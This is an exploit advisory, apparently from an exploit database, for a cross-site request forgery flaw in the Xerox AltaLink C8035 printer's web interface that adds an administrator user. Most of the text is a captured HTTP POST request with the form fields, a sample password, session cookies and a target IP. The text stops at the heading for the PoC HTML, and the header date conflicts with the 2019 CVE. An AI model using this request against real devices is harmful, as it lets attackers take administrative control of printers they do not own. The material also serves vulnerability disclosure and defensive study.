# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-17 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series # Software : Xerox Printer # Product Version: AltaLink C8035 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : CVE-2019-19832 # Description : The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware. A request to add users is made in the Device User Database form field. This request is captured by the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request to add users is made in the Device User Database form field to the xerox.set URI. (The frmUserName value must have a unique name.) # HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: 158.162.130.37 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 707 Origin: https://158.162.130.37 Connection: close Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10 Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp Upgrade-Insecure-Requests: 1 NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a¤tPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10 # CSRF PoC HTML :